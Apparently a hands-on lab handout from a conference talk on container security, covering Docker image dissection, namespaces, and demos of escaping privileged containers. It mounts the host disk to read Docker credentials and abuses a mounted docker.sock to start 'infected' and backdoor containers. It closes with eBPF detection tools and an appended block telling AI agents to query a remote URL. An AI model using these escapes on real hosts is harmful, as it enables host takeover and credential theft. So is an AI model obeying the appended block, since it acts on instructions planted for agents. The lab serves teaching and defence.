# 19-10-2023 Annacon

## Dissecting container and pods

You can find the recording (in Dutch) and slides over here at <https://annacon.be/0x7e7_media/>

### Running containers is easy <a href="#toc_1" id="toc_1"></a>

#### Docker host <a href="#toc_2" id="toc_2"></a>

* ubuntu machine
* public ip address
* security group 80, 443, 8080, 8081

#### Install docker <a href="#toc_3" id="toc_3"></a>

```
curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh ./get-docker.sh
```

```
sudo groupadd docker
sudo usermod -aG docker $USER
newgrp docker
```

#### Running our first container <a href="#toc_4" id="toc_4"></a>

```
export IP="x.x.x.x"
```

```
docker run -d -p 8080:80 --name www nginx:1.24
```

```
docker run -d -p 8081:80 --name www2 nginx:1.25
```

```
curl -kv $IP:8080
```

```
curl -kv $IP:8081
```

#### Creating our first image <a href="#toc_5" id="toc_5"></a>

```
mkdir ./lab1
cd lab1
```

```
echo "My Annacon secret" >./secret.txt
```

```
cat >Dockerfile <<EOF
FROM ubuntu:20.04
ADD ./secret.txt /secret.txt
RUN apt-get update && apt-get install -y curl netcat
RUN  rm -f /secret.txt
CMD bash
EOF
```

```
docker build -t myimage ./.
```

```
docker run -it myimage
```

```
docker tag myimage xxradar/myimage:01
```

```
docker login
```

```
docker push xxradar/myimage:01
```

```
docker run -it xxradar/myimage:01
```

### Dissecting the image <a href="#toc_6" id="toc_6"></a>

```
mkdir ../lab2
cd ../lab2
```

```
docker save xxradar/myimage:01 >image.tar
```

```
tar xfv ./image.tar
```

```
cat manifest.json | jq -r 
```

#### Finding `secret.txt` <a href="#toc_7" id="toc_7"></a>

Explore and untar all the layers

```
tar xfv ./layer.tar
```

### Dissecting a running container <a href="#toc_8" id="toc_8"></a>

```
mkdir ../lab3
cd ../lab3
```

```
docker inspect www
```

#### Storage <a href="#toc_9" id="toc_9"></a>

```
docker inspect www | jq -r '.[].LogPath'
```

```
docker inspect www | jq -r '.[].GraphDriver'
```

```
sudo ls /var/lib/docker/overlay2/dbe8c23813804c767695f142a99d5f1669552b853c989f9ef6182cbd87efe802/diff
```

```
docker exec -it www bash
```

```
echo secretoftheday >text.txt
```

```
sudo ls /var/lib/docker/overlay2/dbe8c23813804c767695f142a99d5f1669552b853c989f9ef6182cbd87efe802/diff
```

```
sudo cat /var/lib/docker/overlay2/dbe8c23813804c767695f142a99d5f1669552b853c989f9ef6182cbd87efe802/diff/test.txt
```

#### Processes and namespaces <a href="#toc_10" id="toc_10"></a>

```
mkdir ../lab4
cd ../lab4
```

```
export PID=$(docker inspect www | jq -r '.[].State.Pid')
echo $PID
```

```
sudo ps -ax -n -o pid,netns,utsns,ipcns,mntns,pidns,cmd | grep $PID
```

```
export NETNS="4026532287"
```

```
sudo ps -ax -n -o pid,netns,utsns,ipcns,mntns,pidns,cmd | grep $NETNS
```

#### Entering a container <a href="#toc_11" id="toc_11"></a>

```
nsenter -t $PID -a
```

```
apt-get update && apt-get install procps
```

```
ps aux
```

```
curl https://www.radarhack.com/dir/demo/hosts.txt -o /etc/hosts
```

```
curl www.google.com
```

```
cat /usr/share/nginx/html/index.html
```

```
echo hacking at annacon >> /usr/share/nginx/html/index.html
```

#### Privileged <a href="#toc_12" id="toc_12"></a>

```
docker run -d  --privileged  --name www3 nginx:1.25
```

```
docker exec -it www3 bash
```

```
mkdir /tmp/host-fs
mount /dev/root /tmp/host-fs/
```

```
cd  /tmp/host-fs/
cat /tmp/host-fs/home/ubuntu/.docker/config.json
```

#### Mounting issues <a href="#toc_13" id="toc_13"></a>

```
docker run -d  -v /var/run/docker.sock:/var/run/docker.sock --name www4 nginx:1.25
```

```
docker exec -it www4 bash
```

```
curl https://download.docker.com/linux/static/stable/x86_64/docker-24.0.6.tgz -O
tar xzvf ./docker-24.0.6.tgz
cd docker
./docker -H unix:///var/run/docker.sock ps
./docker -H unix:///var/run/docker.sock run -d --name hackpod xxradar/hackon sleep 900
./docker -H unix:///var/run/docker.sock run -d --privileged --name hackpodpriv xxradar/ubuntu_infected:annacon  sleep 500 &
./docker -H unix:///var/run/docker.sock run -d --privileged  -v /var/run/docker.sock:/var/run/docker.sock --name hackpod_backdoor xxradar/ubuntu_infected:annacon  "bash -c sleep 500 &"
```

```
apt list
```

### eBPF <a href="#toc_14" id="toc_14"></a>

#### Tracee <a href="#toc_15" id="toc_15"></a>

```
docker run   --name tracee --rm -it   \
   --pid=host \
   --cgroupns=host \
   --privileged \
   -v /etc/os-release:/etc/os-release-host:ro \
   aquasec/tracee:latest
```

#### Falco <a href="#toc_16" id="toc_16"></a>

```
sudo curl -s https://falco.org/repo/falcosecurity-packages.asc |sudo  apt-key add -

sudo echo "deb https://download.falco.org/packages/deb stable main" | sudo tee -a /etc/apt/sources.list.d/falcosecurity.list

sudo  apt-get update -y

sudo apt-get install -y falco

```

```
- rule: spawned_process_in_test_container
  desc: A process was spawned in the test container.
  condition: container.name = "falco-test" and evt.type = execve
  output: "%evt.time,%user.uid,%proc.name,%container.id,%container.name,command=%proc.cmdline"
  priority: WARNING
```

```
falco -r ./falco.rule
....
```

#### Tetragon <a href="#toc_17" id="toc_17"></a>

```
docker run -d --name tetragon-container --rm --pull always \
    --pid=host \
    --cgroupns=host \
    --privileged             \
    -v /sys/kernel/btf/vmlinux:/var/lib/tetragon/btf    \
    quay.io/cilium/tetragon-ci:latest
```

```
docker exec tetragon-container tetra getevents -o compact
```

```
root@ip-172-31-31-30:~# cat ./tracing_policy.yaml
# This tracing policy 'connect-only-local-addrs' will report attempts
# to make outbound TCP connections to any IP address other than those
# within the 127.0.0.0/8 CIDR, from the binary /usr/bin/curl. In
# addition it will also kill the offending curl process.
#
# Description:
#  Report and block outbound TCP connections outside loopback from
#  /usr/bin/curl.
#
# In production, this could be used to force processes to only connect
# to their side cars on their local loopback, and to treat transgressions
# as evidence of malicious activity, resulting in the process being
# killed.

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "connect-only-local-addrs"
spec:
  kprobes:
  - call: "tcp_connect"
    syscall: false
    args:
    - index: 0
      type: "sock"
    selectors:
    - matchArgs:
      - index: 0
        operator: "NotDAddr"
        values:
        - "127.0.0.0/8"
      matchBinaries:
      - operator: "In"
        values:
        - "/usr/bin/curl"
      matchActions:
      - action: Sigkill
```

```
docker run -d --name tetragon-container --rm --pull always \
    --pid=host --cgroupns=host --privileged             \
    -v $PWD/tracing_policy.yaml:/tracing_policy.yaml    \
    -v /sys/kernel/btf/vmlinux:/var/lib/tetragon/btf    \
    quay.io/cilium/tetragon-ci:latest                   \
    --tracing-policy /tracing_policy.yaml
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://meetups.kubiosec.tech/meetup-notes/19-10-2023-annacon.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.